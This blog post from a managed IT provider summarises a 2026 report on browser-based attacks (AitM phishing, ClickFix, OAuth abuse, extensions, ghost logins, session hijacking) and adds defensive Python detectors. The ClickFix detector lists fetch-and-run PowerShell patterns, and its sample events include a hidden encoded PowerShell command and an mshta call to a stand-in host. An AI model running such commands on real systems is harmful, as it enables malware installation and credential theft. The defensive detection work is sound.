Shane

Browser-Based Attacks Are the Biggest Threat Your Business Isn’t Watching For

How Browser-Based Attacks Work and What Houston Businesses Should Do About Them – Understanding the Six Techniques Behind Modern Browser-Based Breaches


The 2026 Push Security report reveals how attackers are bypassing MFA, hijacking sessions, and stealing data - all from inside the browser.

TL;DR
Browser-based attacks now drive the majority of modern breaches, bypassing MFA, endpoint security, and email filters. Techniques like AitM phishing, ClickFix, malicious extensions, and session hijacking let attackers steal credentials and data without ever touching the endpoint. Houston businesses need browser-level visibility to stay protected.

Push Security's 2026 Browser Attack Techniques report dropped a stat that should make every IT leader in Houston sit up straight: 1 in 3 malicious payloads intercepted in 2025 were delivered outside of email. That means your email filter - no matter how good it is - only covers part of the threat surface. The rest? It's happening inside the browser, where most of your employees spend 85% or more of their workday.

The report breaks down six primary browser-based attack techniques that are fueling data theft, ransomware, and extortion campaigns across every industry. What makes these attacks so effective is that they happen inside the browser sandbox, blend in with legitimate web traffic, and bypass the traditional security stack that most small and mid-sized businesses rely on.

CinchOps is a managed IT services provider based in Katy, Texas, serving small and mid-sized businesses across the Houston metro area. CinchOps specializes in cybersecurity, network security, managed IT support, VoIP, and SD-WAN for businesses with 10-200 employees.

Key takeaway from the report: The browser is the new endpoint. If your security tools don't have visibility inside the browser session itself, attackers are operating in a blind spot. This matters for every Houston business running cloud apps and SaaS services - which is essentially all of them.
Six Browser Attack Techniques, One Outcome
[Figure: six browser-based techniques (AitM phishing, ClickFix / *Fix variants, malicious OAuth apps, malicious extensions, credential stuffing, session hijacking) converge on one outcome: cloud app compromise (SaaS, IdP, cloud portals) followed by data theft, access disruption, and extortion. Callouts: 95% used bot protection to evade scanning; 29 min average breakout time from access to data theft. Source: Push Security 2026, CrowdStrike 2025 Global Threat Report]
The Browser Is the New Battleground
Why attackers have shifted from targeting endpoints to targeting what happens inside the browser.

For years, cybersecurity focused on protecting the endpoint - the laptop, the desktop, the server. But the report makes a convincing case that the center of gravity has shifted. Modern breaches start in the browser and, frequently, never leave it. Attackers take over accounts, hijack access to cloud apps, and extract data - all through the browser window.

The attack economics tell the story clearly. A Chrome remote code execution exploit costs around $250,000. An identity provider admin account from a criminal broker runs about $3,000. A phishing kit rental for a year costs $1,000. And a bulk list of stolen credentials? $15. The barrier to entry for browser-based attacks is almost nonexistent compared to traditional exploits.

Cost of Attack Tools: Traditional Exploits vs. Browser-Based Attacks (Push Security 2026)
[Chart: traditional exploit, Chrome RCE exploit $250,000; browser-based attacks, IAB-provided IdP admin account $3,000, 1-year phishing kit rental $1,000, stolen credential bulk list $15]

Attackers are also getting smarter about delivery. They're distributing malicious links through LinkedIn DMs, Google Search ads, and social media - channels that have almost no content screening and are invisible to most security tools. When they do use email, they abuse legitimate services to send from trusted domains, bypassing email security entirely.

The list of legitimate services being abused reads like a who's who of business tools: Microsoft Dynamics, SharePoint, Adobe, Google Firebase, Google Sites, Jotform, Cloudflare, Atlassian, and more. According to the report, 95% of in-browser attacks detected used some form of bot protection service to evade scanning tools. The attackers are using security tools against other security tools.

1 in 3 Malicious Payloads Intercepted Were Delivered Outside of Email
[Chart: email delivery 67%, non-email delivery 33%. Non-email delivery channels: search engines / malvertising, LinkedIn DMs / job posts, social media ads, infected websites, messaging platforms. Source: Push Security 2026 Browser Attack Techniques Report]

For Houston businesses running Microsoft 365 and cloud-based applications, this shift demands a rethink. It's not enough to protect the device. You need to protect what's happening inside the browser session.

Adversary-in-the-Middle (AitM) Phishing Attacks
How attackers are stealing session tokens in real time - and why MFA alone won't stop them.

Adversary-in-the-Middle, or AitM, is a reverse-proxy phishing technique where the attacker relays traffic between a fake site and the real site in real time. As the victim enters credentials, passes MFA checks, and receives a session token from the application, the attacker intercepts everything. The victim is then redirected to the real site, reducing suspicion.

How AitM Phishing Intercepts Credentials, MFA Tokens, and Session Cookies in Real Time
[Diagram: the victim enters credentials on the attacker's fake login page; the attacker's proxy relays traffic in real time to the real login page (Microsoft, Google, Okta) and captures the credentials, the MFA response, and the session token; the victim is redirected to the real site with no suspicion; the attacker gains full account takeover plus an SSO pivot. Tycoon 2FA accounts for 59% of AitM detections; MFA is bypassed in real time.]

This is not theoretical. AitM is now the standard phishing method in use today. The report identifies Tycoon 2FA as the dominant phishing kit, responsible for 59% of detections, followed by Sneaky2FA, FlowerStorm, Evilginx, NakedPages, and Gabagool. These kits are available for rent on criminal marketplaces and are constantly adding new features - better site impersonation, new detection evasion, and improved social engineering.

The primary targets are enterprise cloud and identity provider accounts - Google Workspace, Microsoft Entra, and Okta. Once an attacker captures a session for an identity provider, they can hijack single sign-on to pivot into downstream SaaS applications, dramatically increasing the blast radius of a single compromise.
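To show why phishing-resistant authentication survives this kind of relay, here is an added example (not from the Push Security report or CinchOps) of the relying-party checks a passkey login must pass before any signature is examined. The RP ID, origins, and challenge bytes are constructed for the demo, and signature verification itself is left out.

```python
"""Why an AitM reverse proxy cannot relay a passkey (WebAuthn) login.

The browser, not the page's JavaScript, writes the origin it actually loaded
into clientDataJSON, and the authenticator signs over that data. The relying
party (RP) rejects any assertion whose origin is not its own, so a proxy on a
lookalike domain ends up with nothing it can replay. Everything below is a
constructed illustration, not a production WebAuthn implementation.
"""
import base64
import hashlib
import json

RP_ID = "accounts.example.com"                      # constructed RP
ALLOWED_ORIGINS = {"https://accounts.example.com"}  # constructed
CHALLENGE = bytes(range(32))                        # fixed so the demo repeats

FLAG_USER_PRESENT = 0x01
FLAG_USER_VERIFIED = 0x04


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def verify_assertion_binding(client_data_json: bytes, authenticator_data: bytes,
                             expected_challenge: bytes) -> tuple[bool, str]:
    """RP-side binding checks; a real RP verifies the signature after these."""
    client = json.loads(client_data_json)
    if client.get("type") != "webauthn.get":
        return False, "not an authentication ceremony"
    if b64url_decode(client.get("challenge", "")) != expected_challenge:
        return False, "challenge mismatch: replayed or foreign assertion"
    origin = client.get("origin")
    if origin not in ALLOWED_ORIGINS:
        return False, f"origin {origin!r} is not the RP origin"
    if len(authenticator_data) < 37:
        return False, "authenticator data too short"
    if authenticator_data[:32] != hashlib.sha256(RP_ID.encode()).digest():
        return False, "rpIdHash does not match RP ID"
    if not authenticator_data[32] & FLAG_USER_PRESENT:
        return False, "user presence not asserted"
    return True, "binding checks passed; verify signature next"


def make_client_data(origin: str, challenge: bytes) -> bytes:
    """clientDataJSON as the browser builds it for a page loaded from `origin`."""
    return json.dumps({"type": "webauthn.get", "challenge": b64url_encode(challenge),
                       "origin": origin, "crossOrigin": False}).encode()


def make_authenticator_data(rp_id: str, flags: int, counter: int = 1) -> bytes:
    """rpIdHash (32) || flags (1) || signCount (4): the minimal authenticator data."""
    return hashlib.sha256(rp_id.encode()).digest() + bytes([flags]) + counter.to_bytes(4, "big")


def demo() -> dict:
    auth = make_authenticator_data(RP_ID, FLAG_USER_PRESENT | FLAG_USER_VERIFIED)
    # 1. Victim signs in on the genuine site: accepted.
    legit = verify_assertion_binding(
        make_client_data("https://accounts.example.com", CHALLENGE), auth, CHALLENGE)
    # 2. Victim is on an AitM proxy. The browser records the proxy's origin (a
    #    constructed lookalike). In practice the browser would refuse to use a
    #    credential scoped to RP_ID from this origin at all, so the proxy never
    #    even receives an assertion.
    proxied = verify_assertion_binding(
        make_client_data("https://accounts.example.com.verify-proxy.test", CHALLENGE),
        auth, CHALLENGE)
    # 3. A captured genuine assertion replayed against a later login: the server
    #    issued a fresh challenge, so the old one no longer matches.
    replayed = verify_assertion_binding(
        make_client_data("https://accounts.example.com", CHALLENGE), auth, bytes(32))
    return {"legitimate": legit, "via_proxy": proxied, "replayed": replayed}


if __name__ == "__main__":
    for name, (ok, reason) in demo().items():
        print(f"{name:>11}: {'ACCEPT' if ok else 'REJECT'} ({reason})")
```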

The Scattered Lapsus$ Hunters collective (a merger of Scattered Spider, Lapsus$, and ShinyHunters) is running a campaign that has targeted over 100 companies using a human-operated AitM kit. The attacker calls the victim impersonating IT, directs them to a branded phishing page, captures their session in real time, and then guides them through setting up a passkey - which the attacker also intercepts for persistent access. Victims include Betterment, Crunchbase, SoundCloud, and Match Group.

  • 2022, Lapsus$: EA Games, Okta, Nvidia, Microsoft, T-Mobile, Rockstar
  • 2023, Scattered Spider: Okta/Entra ransomware campaign (Caesars, MGM Resorts), Klaviyo, Mailchimp, Doordash
  • 2024, ShinyHunters + Scattered Spider merge: Snowflake campaign (165+ customers, 1B+ records), Transport for London, PowerSchool
  • 2025, "Scattered Lapsus$ Hunters" collective: Entra ransomware attacks (Marks & Spencer, Co-op, JLR), Salesforce campaign (1,000+ orgs, 1.5B records), Jira campaign (9 victims)
  • 2026, continued escalation: AitM phishing campaign (Betterment, MatchGroup, SoundCloud, GrubHub), new device code phishing campaign targeting Microsoft

Each year brings new browser-based techniques (stolen creds, device code phishing, human-operated AitM) and broader targeting. Breakout time averages 3 hours for ransomware campaigns.

The critical takeaway for Houston businesses: MFA alone does not stop AitM attacks. If your phishing defense relies on email filters and MFA, you have a gap that attackers are actively exploiting.

ClickFix and *Fix Variants
Fake CAPTCHAs and "verify you're human" tricks that install malware with a copy-paste action.

ClickFix attacks trick users into performing malicious actions under the guise of "fixing" a problem or "verifying they're human." The most common version mimics the bot protection challenges everyone encounters on the web. The user copies malicious code to their clipboard and is guided to paste and execute it on their machine - installing remote access tools and infostealer malware.

ClickFix was the most common initial access vector reported by Microsoft in 2025, accounting for 47% of attacks. CrowdStrike reported that fake CAPTCHA lures were the most common malware download they identified, increasing 563%. Four out of five ClickFix payloads intercepted by Push were accessed through search engines as the result of malvertising or infected webpages - not email.

What makes ClickFix effective is that it's both fileless and user-executed. Because the user initiates the action rather than a program, EDR tools are less likely to flag it. Combined with polished lures that include video instructions and countdown timers, the social engineering is extremely convincing.

ClickFix Attack Chain: From Fake CAPTCHA to Credential Theft
[Diagram: Step 1, malicious code copied to clipboard; Step 2, user tricked into running the command; Step 3, malware installed (RAT / infostealer); Step 4, credentials and cookies stolen. Callouts: 47% of attacks, ClickFix was the #1 initial access vector (Microsoft 2025); 563% increase, fake CAPTCHA lures were the #1 malware download (CrowdStrike); 4 in 5 ClickFix payloads arrived via search engines (malvertising or infected pages); fileless and user-executed, bypassing EDR because the user initiates the action. Sources: Push Security 2026, Microsoft, CrowdStrike 2025]
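Because ClickFix ends with the user pasting a command into the Run dialog or a terminal, the detection angle is process telemetry rather than email or file scanning. The following is an added example (not from the report or CinchOps) that flags interpreters spawned from the Run dialog or a browser with hidden or obfuscated arguments; all events are constructed samples in a Sysmon-like shape.

```python
"""Detection pass over process-creation events for the ClickFix pattern.

The telltale is an interpreter started by a user-facing parent (explorer.exe
for Win+R, or a browser) with flags that hide the window or obfuscate the
command. Fields mirror Sysmon Event ID 1 / EDR process telemetry. All sample
events and paths are constructed for this example.
"""
import re
from dataclasses import dataclass

INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe"}
# Parents a pasted command typically runs from (Run dialog, browser download bar).
USER_LAUNCH_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
# Indicators of a hidden or obfuscated one-liner; matched case-insensitively.
SUSPICIOUS_ARGS = [
    r"-w(?:indowstyle)?\s+hidden",
    r"-enc(?:odedcommand)?\b",
    r"-ep\s+bypass|-executionpolicy\s+bypass",
    r"\biex\b|invoke-expression",
    r"downloadstring|invoke-webrequest|\biwr\b",
    r"mshta\.exe\s+https?://",
]


@dataclass
class ProcessEvent:
    event_id: int
    user: str
    parent_image: str
    image: str
    command_line: str


def clickfix_indicators(ev: ProcessEvent) -> list[str]:
    """Return the matched indicators for one event; an empty list means benign."""
    image = ev.image.lower().rsplit("\\", 1)[-1]
    parent = ev.parent_image.lower().rsplit("\\", 1)[-1]
    if image not in INTERPRETERS or parent not in USER_LAUNCH_PARENTS:
        return []
    hits = [f"user-launched {image} from {parent}"]
    for pattern in SUSPICIOUS_ARGS:
        if re.search(pattern, ev.command_line, re.IGNORECASE):
            hits.append(f"argument matches /{pattern}/")
    # An interpreter from the Run dialog alone is common enough to be noise;
    # escalate only when an obfuscation indicator is also present.
    return hits if len(hits) > 1 else []


def scan(events: list[ProcessEvent]) -> dict[int, list[str]]:
    """Map event_id -> indicators for every event that should be escalated."""
    return {ev.event_id: hits for ev in events if (hits := clickfix_indicators(ev))}


# Constructed sample telemetry: events 2 and 4 model the copy-paste outcome,
# events 1 and 3 are ordinary admin and user activity.
SAMPLE_EVENTS = [
    ProcessEvent(1, "CORP\\admin", r"C:\Program Files\WindowsApps\WindowsTerminal.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -NoProfile -File C:\\scripts\\inventory.ps1"),
    ProcessEvent(2, "CORP\\jdoe", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -w hidden -ep bypass -enc <REDACTED-BASE64-PLACEHOLDER>"),
    ProcessEvent(3, "CORP\\jdoe", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\notepad.exe",
                 "notepad.exe C:\\Users\\jdoe\\notes.txt"),
    ProcessEvent(4, "CORP\\asmith", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
                 r"C:\Windows\System32\mshta.exe",
                 "mshta.exe https://captcha-check.example.test/verify"),
]

if __name__ == "__main__":
    for event_id, hits in scan(SAMPLE_EVENTS).items():
        print(f"event {event_id}: " + "; ".join(hits))
```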

ConsentFix: A Fully Browser-Native Variant

Push Security researchers discovered a new variant called ConsentFix in late 2025. This attack merges ClickFix-style social engineering with a fully browser-based attack path. The victim copies sensitive OAuth key material from a legitimate Microsoft webpage into a phishing site, unknowingly giving the attacker control of their account through Azure CLI. No endpoint malware involved at all.

This campaign was traced back to Russian state-affiliated APT29. The phishing pages were injected into numerous compromised websites and fingerprinted visitors' IP addresses and browsers - only triggering once per visitor and only when specific conditions were met. It ran undetected for months.

For businesses in Katy, Sugar Land, and the greater Houston area, the lesson is clear: your employees don't need to click a suspicious email link to get compromised. A Google search, an infected website, or a LinkedIn message can do the job.

Malicious OAuth App Integrations
How attackers bypass login protections entirely by abusing app authorization flows.

OAuth attacks are growing fast, and they sidestep the traditional login process entirely. The attacker creates a malicious application - or sets up a fake instance of an existing legitimate app - and tricks the victim into authorizing it. Two primary techniques are in play: consent phishing (authorizing a third-party app via an OAuth consent grant) and device code phishing (authorizing an app via a device code flow).

The dangerous part: the victim never enters a password and never passes an MFA check. They click a button or enter a code on a legitimate webpage. That's it. Normal login protections, including phishing-resistant authentication like passkeys, are completely circumvented.

The Scattered Lapsus$ Hunters collective demonstrated the scale of this technique with a massive campaign against Salesforce customers in 2025. They registered a malicious "DataLoader" app (mimicking a legitimate Salesforce tool) configured to request broad OAuth scopes - full API access and the ability to generate refresh tokens without re-authentication. The attacker called victims impersonating IT and walked them through authorizing the app. The result: over 1,000 organizations claimed as compromised and 1.5 billion records stolen.

Users aren't trained to recognize OAuth authorization as a threat. It doesn't feel risky the way entering a password does. You're just clicking a button on a real Microsoft or Salesforce page. This is a serious awareness gap that law firms, CPA practices, and other professional services firms across Houston need to address.
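An added example (not the report's or CinchOps' code) that scores OAuth grants for the traits the DataLoader campaign relied on: broad scopes, refresh tokens, user rather than admin consent, and an unverified, newly registered publisher. The grant records and field names are constructed; a real run would map your IdP's or SaaS app's connected-app export onto them.

```python
"""Triage of OAuth app grants for consent-phishing traits.

Each grant earns risk points per trait; anything at or above a threshold is
listed for review. Records, client ids and addresses are constructed and the
field layout is generic, not any one vendor's API.
"""
from dataclasses import dataclass, field
from datetime import date

# Scopes that mean "everything" (vendor spellings vary; extend for your apps).
BROAD_SCOPES = {"full", "api", "*", "files.readwrite.all", "mail.readwrite",
                "directory.readwrite.all"}
# Scopes that keep access alive without re-authentication.
PERSISTENCE_SCOPES = {"refresh_token", "offline_access"}


@dataclass
class OAuthGrant:
    app_name: str
    client_id: str
    scopes: list[str]
    consent_type: str            # "user" or "admin"
    publisher_verified: bool
    app_created: date
    consented_by: str
    reasons: list[str] = field(default_factory=list)


def score_grant(g: OAuthGrant, today: date) -> int:
    """Return the risk score and record the reasons on the grant."""
    g.reasons = []
    score = 0
    scopes = {s.lower() for s in g.scopes}
    if scopes & BROAD_SCOPES:
        score += 3
        g.reasons.append(f"broad scopes {sorted(scopes & BROAD_SCOPES)}")
    if scopes & PERSISTENCE_SCOPES:
        score += 2
        g.reasons.append("refresh/offline access survives password and MFA changes")
    if g.consent_type == "user":
        score += 2
        g.reasons.append("user consent, not admin-reviewed")
    if not g.publisher_verified:
        score += 2
        g.reasons.append("publisher not verified")
    if (today - g.app_created).days < 30:
        score += 1
        g.reasons.append("app registered less than 30 days ago")
    return score


def triage(grants: list[OAuthGrant], today: date, threshold: int = 6) -> list[tuple]:
    """Return (app_name, score, reasons) at or above threshold, riskiest first."""
    scored = [(g.app_name, score_grant(g, today), g.reasons) for g in grants]
    return sorted([s for s in scored if s[1] >= threshold], key=lambda s: -s[1])


TODAY = date(2026, 1, 15)   # constructed reference date
SAMPLE_GRANTS = [
    # Lookalike of a data-loading tool, authorised by a user after a phone call.
    OAuthGrant("Data Loader", "client-id-placeholder-1", ["full", "refresh_token"],
               "user", False, date(2026, 1, 3), "jdoe@example.com"),
    # Sanctioned integration: admin-consented, verified publisher, long-standing.
    OAuthGrant("Payroll Connector", "client-id-placeholder-2", ["api"],
               "admin", True, date(2024, 6, 1), "it-admin@example.com"),
    # Casual user consent to a narrow, read-only scope with no persistence.
    OAuthGrant("Meeting Notes", "client-id-placeholder-3", ["calendars.read"],
               "user", True, date(2025, 8, 20), "asmith@example.com"),
]

if __name__ == "__main__":
    for name, score, reasons in triage(SAMPLE_GRANTS, TODAY):
        print(f"{name}: {score}\n  - " + "\n  - ".join(reasons))
```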

Malicious Browser Extensions
Legitimate extensions turned weaponized - intercepting credentials, cookies, and session tokens.

Malicious browser extensions are becoming one of the most scalable attack vectors available. The typical pattern: an attacker acquires a legitimate, popular extension - either by phishing the developer, purchasing it outright, or building their own - and then pushes a malicious update. Every browser with that extension installed is infected on the next auto-update.

The Cyberhaven extension compromise in December 2024 is a textbook example. Attackers phished a developer into authorizing a malicious OAuth app, gained permissions to manage Chrome Web Store extensions, and uploaded a compromised version. Every time a browser with the infected extension launched, it fetched a configuration from a remote server. Different browsers received different payloads - some harvested Facebook Ads tokens, others targeted OpenAI session tokens. By dynamically loading configurations, the actual malicious behavior couldn't be identified through static code analysis alone.

A more recent campaign called "GhostPoster" involved 34 extensions with 890,000 installs. The malicious code waited 48 hours between check-ins and only loaded its payload 10% of the time - making detection through behavioral analysis extremely difficult.

Permissions alone aren't a reliable indicator of risk. Almost every extension has permissions that could be exploited. And malicious extensions regularly achieve "Featured" or "Verified" status in browser extension stores by using dynamically compiled, stealthily smuggled code that passes security reviews.

For construction companies, manufacturers, and other Houston businesses where employees install browser extensions for productivity, this is a real and growing risk vector that needs managed IT oversight.

Credential Stuffing and Ghost Logins
Billions of stolen credentials meet SaaS apps that still accept password-only logins.

Password-based attacks are arguably worse than ever. There are now billions of stolen credentials available online, fed by a constant stream of infostealer infections and data breaches. Attackers download credential databases and spray them across business applications. When they find a match with no MFA, they're in.

The numbers from Push Security's data on the last million logins they observed are striking:

  • 1 in 4 were password logins, not SSO (25% of logins bypass SSO entirely)
  • 2 in 5 were not protected by MFA (40% of logins lack any second factor)
  • 1 in 5 used a weak, breached, or reused password (20% use passwords already exposed online)

Data from the last million logins observed by Push Security.

The assumption that "our users log in via SSO and MFA protects everything" doesn't hold up in practice. Many SaaS apps charge extra for SAML SSO or don't offer it at all. Even when SSO is available, shadow IT adoption means apps get used before IT configures them. And here's the kicker: most apps support simultaneous login methods by default and don't let you disable alternatives. This creates what Push calls "ghost logins" - backup authentication paths outside your SSO that don't show up in your identity provider logs.

[Diagram: what you think happens: the employee passes the MFA check at the identity provider, SSO covers App 1, App 2, and App 3, and all logins are visible in IdP logs. What actually happens: only App 1 uses SSO; App 2 and App 3 accept password-only "ghost" logins with no MFA and no IdP logs, the backup auth paths outside SSO that attackers exploit.]
Ghost logins create invisible authentication backdoors outside your SSO
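The following is an added example (not from the report or CinchOps) of the comparison a ghost-login audit comes down to: each login in an app's own sign-in log is checked against the IdP's SSO log, and anything the IdP never saw is surfaced. Both logs and their field layout are constructed.

```python
"""Finding ghost logins by comparing a SaaS app's sign-in log with the IdP log.

A login the app recorded with a password, one it attributes to SSO that the
IdP issued no assertion for, or an SSO assertion issued without MFA is an
authentication path outside the IdP's view. Both logs are constructed.
"""
from datetime import datetime, timedelta

# IdP log: one row per SSO assertion issued: (user, target app, time, MFA satisfied).
IDP_SSO_LOG = [
    ("jdoe@example.com", "crm", "2026-01-12T08:55:10", True),
    ("asmith@example.com", "crm", "2026-01-12T09:02:41", False),
    ("jdoe@example.com", "wiki", "2026-01-12T13:10:05", True),
]
# App-side log: how the app itself recorded each session's authentication.
APP_AUTH_LOG = [
    ("crm", "jdoe@example.com", "sso", "2026-01-12T08:55:14", "203.0.113.10"),
    ("crm", "asmith@example.com", "sso", "2026-01-12T09:02:45", "203.0.113.11"),
    ("crm", "bwong@example.com", "password", "2026-01-12T22:14:03", "198.51.100.7"),
    ("wiki", "jdoe@example.com", "sso", "2026-01-12T13:10:09", "203.0.113.10"),
    ("wiki", "jdoe@example.com", "sso", "2026-01-13T02:41:30", "198.51.100.9"),
]

# How far apart an IdP assertion and the app's matching login may be.
MATCH_WINDOW = timedelta(minutes=2)


def _ts(s: str) -> datetime:
    return datetime.fromisoformat(s)


def find_ghost_logins(idp_log, app_log, window=MATCH_WINDOW):
    """Return (app, user, time, finding) for every login outside the IdP's view."""
    findings = []
    for app, user, method, when, src_ip in app_log:
        t = _ts(when)
        if method != "sso":
            findings.append((app, user, when,
                             f"{method} login from {src_ip}: never passed the IdP or its MFA"))
            continue
        match = next((row for row in idp_log
                      if row[0] == user and row[1] == app and abs(_ts(row[2]) - t) <= window),
                     None)
        if match is None:
            findings.append((app, user, when,
                             f"app reports SSO but the IdP issued no assertion within {window}"))
        elif not match[3]:
            findings.append((app, user, when, "SSO assertion issued without MFA"))
    return findings


def password_login_share(app_log) -> dict[str, float]:
    """Per app, the fraction of logins that bypassed SSO with a password."""
    totals, passwords = {}, {}
    for app, _user, method, _when, _ip in app_log:
        totals[app] = totals.get(app, 0) + 1
        passwords[app] = passwords.get(app, 0) + (method == "password")
    return {app: passwords[app] / totals[app] for app in totals}


if __name__ == "__main__":
    for app, user, when, finding in find_ghost_logins(IDP_SSO_LOG, APP_AUTH_LOG):
        print(f"{when} {app:<5} {user:<20} {finding}")
    print(password_login_share(APP_AUTH_LOG))
```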

The Snowflake breach of 2024 is the poster child. ShinyHunters breached more than 165 organizations by logging into their Snowflake tenants with stolen credentials. 80% of the compromised accounts had been exposed in prior breaches, with some credentials dating back to 2020. Over 1 billion records were stolen from just 9 publicly named victims.

For every wealth management firm, engineering company, and oil and gas operator in the Houston metro area: if you can't see every login method for every app your team uses, you have ghost logins. And attackers know how to find them.

Session Hijacking (Token Replay)
Stolen session cookies let attackers bypass even passkeys and phishing-resistant MFA.

Session hijacking attacks take an already-approved session token from a victim's device or browser and replay it in the attacker's browser. This bypasses the authentication process entirely - including phishing-resistant controls like passkeys. The attacker doesn't need to log in at all. They just import a valid session cookie and they're inside the account.

The primary source of stolen session tokens is infostealer malware, often delivered via ClickFix. Malicious browser extensions can also extract session tokens from visited webpages. Once stolen, these tokens are sold or used directly by the attacker.

The 2023 Okta incident illustrates the cascade effect. An Okta support engineer's personal device was infected with infostealer malware. The attacker accessed corporate credentials that had been synced to the employee's personal Google account, then used those to access Okta's customer support portal. From there, they downloaded files containing session tokens for customer tenants. 134 customers were impacted. BeyondTrust, 1Password, and Cloudflare all reported further attacker activity - with Cloudflare confirming the attacker accessed their internal Atlassian server, Confluence wiki, Jira database, and source code.

The root cause: an employee had signed into their personal Google profile on their corporate laptop. Corporate credentials synced to the personal account, and when the personal device was compromised, those credentials went with it. This is a reminder that browser profile syncing between personal and work accounts is a real security risk that most organizations don't track.
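An added example (not from the report or CinchOps) of one replay signal a defender can look for: the same session identifier active from two client fingerprints within a short window while the victim's own device is still using it. The session events are constructed, and ASN plus user agent stands in for whatever fingerprint your telemetry provides (an attacker can spoof the user agent, so treat it as one signal among several).

```python
"""Detecting session token replay from per-session activity telemetry.

A session cookie stolen by an infostealer is imported into the attacker's
browser, so the same session id appears from a second network and client
while the victim continues to use it. Events below are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# (session_id, user, time, source_ip, asn, user_agent)
SESSION_EVENTS = [
    ("s-1001", "jdoe@example.com", "2026-01-12T08:55:14", "203.0.113.10", "AS64500", "Chrome/122 Windows"),
    ("s-1001", "jdoe@example.com", "2026-01-12T09:20:02", "203.0.113.10", "AS64500", "Chrome/122 Windows"),
    ("s-1001", "jdoe@example.com", "2026-01-12T09:31:47", "198.51.100.77", "AS64512", "Chrome/121 Linux"),
    ("s-1001", "jdoe@example.com", "2026-01-12T09:40:11", "203.0.113.10", "AS64500", "Chrome/122 Windows"),
    # Address change inside the same network and client: not a replay signal.
    ("s-1002", "asmith@example.com", "2026-01-12T09:02:45", "203.0.113.11", "AS64500", "Safari/17 macOS"),
    ("s-1002", "asmith@example.com", "2026-01-12T12:15:09", "192.0.2.44", "AS64500", "Safari/17 macOS"),
    # Different network hours later with the same client: plausible travel, below the window.
    ("s-1003", "bwong@example.com", "2026-01-12T07:10:00", "203.0.113.12", "AS64500", "Chrome/122 Windows"),
    ("s-1003", "bwong@example.com", "2026-01-12T14:05:00", "198.51.100.30", "AS64520", "Chrome/122 Windows"),
]

# Two fingerprints closer together than this are treated as concurrent use.
WINDOW = timedelta(hours=1)


def detect_replay(events, window=WINDOW) -> dict[str, str]:
    """Return {session_id: finding} for sessions used from two distinct
    client fingerprints (ASN + user agent) within `window`."""
    by_session = defaultdict(list)
    for sid, user, when, ip, asn, ua in sorted(events, key=lambda e: e[2]):
        by_session[sid].append((datetime.fromisoformat(when), user, ip, asn, ua))
    findings = {}
    for sid, rows in by_session.items():
        for i in range(1, len(rows)):
            t, user, ip, asn, ua = rows[i]
            prev_t, _, prev_ip, prev_asn, prev_ua = rows[i - 1]
            if (asn, ua) != (prev_asn, prev_ua) and t - prev_t <= window:
                findings[sid] = (f"{user}: session used from {prev_ip} ({prev_asn}, {prev_ua}) "
                                 f"and {ip} ({asn}, {ua}) within {t - prev_t}")
                break   # one finding per session is enough to trigger revocation
    return findings


if __name__ == "__main__":
    for sid, finding in detect_replay(SESSION_EVENTS).items():
        print(f"{sid}: {finding}")
```

Revoking the flagged session (and any refresh token tied to it) is the response that actually ends the attacker's access; resetting the password alone does not.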

29 minutes average breakout time (CrowdStrike 2025). What happens in 29 minutes:

  • 0:00 Browser attack succeeds (AitM, ClickFix, OAuth, session theft)
  • ~5 min Attacker accesses cloud apps via stolen session or SSO pivot
  • ~10 min Discovery: search SharePoint, Salesforce, email for sensitive data
  • ~20 min Mass data exfiltration via API or bulk download
  • 29 min Extortion demand sent. Data gone. Your alert may still be pending.

Why This Matters for Houston Businesses

The average "breakout time" from initial access to high-value assets was just 29 minutes in 2025, according to CrowdStrike. For browser-based attacks targeting cloud apps, the window can be even shorter. If your detection and response capability can't keep up, the data is gone before you know an attack happened. This is why proactive cybersecurity monitoring is critical for small and mid-sized businesses.

How Browser-Based Attacks Bypass Traditional Security Controls
Email filters, web gateways, endpoint security, and MFA all have blind spots when the attack happens inside the browser.

The reason these attacks work so well is that they find gaps in every layer of the traditional security stack. The report maps it out by control type:

  • Email security: Bypassed by delivering links through LinkedIn DMs, Google Search ads, and social media. When email is used, attackers send from trusted domains through legitimate services. They also avoid known-bad domains through constant rotation.
  • Secure web gateways: Bypassed through HTML smuggling, client-side reassembly of encoded pages, and rapid domain rotation that outpaces blocklists.
  • Remote browser isolation: Designed to protect against exploits targeting the browser software itself - not attacks happening inside the browser session like account takeover.
  • File sandboxes: Bypassed through HTML smuggling and fileless delivery methods like ClickFix.
  • Endpoint security: Most browser-based attacks never touch the endpoint. When they do, methods like ClickFix enable stealthy execution that's harder for EDR to flag.
  • Identity and authentication: 2 in 5 logins lack MFA. Ghost logins circumvent SSO. Downgrade attacks can get around phishing-resistant authentication. Many attacks are post-authentication, succeeding regardless of how strong the login process is.
  • Cloud security: In-app exploitation blends in with normal user activity. Cloud logging is inconsistent across apps, creating visibility gaps.
How Browser-Based Attacks Bypass Each Layer of the Traditional Security Stack
[Table: email security (filters, sandboxes): deliver via LinkedIn, Google ads, social media; send from trusted domains via legitimate services. Secure web gateway (proxy, URL filtering): HTML smuggling, client-side reassembly; rapid domain rotation beats blocklists. File sandbox (detonation analysis): fileless delivery (ClickFix); HTML smuggling bypasses download scans. Endpoint security (EDR, AV): most attacks never touch the endpoint; ClickFix is user-initiated and bypasses EDR. Identity / auth (MFA, SSO, conditional access): 2 in 5 logins lack MFA, ghost logins bypass SSO; OAuth/session attacks skip auth entirely. Cloud security (CASB, logging): in-app activity blends with normal usage; inconsistent logging across apps. These controls weren't bad; they were built for a different threat model, and browser attacks exposed the gap.]

None of these controls are bad. They were built for a different threat model. The point is that browser-based attacks have exposed a gap between what these tools were designed to do and what attackers are actually doing today. For businesses in Cypress, The Woodlands, and across the Houston metro area, this means evaluating your security stack with browser-based threats in mind.

How CinchOps Can Help Protect Your Houston Business
Practical steps to close the browser security gap for small and mid-sized businesses.

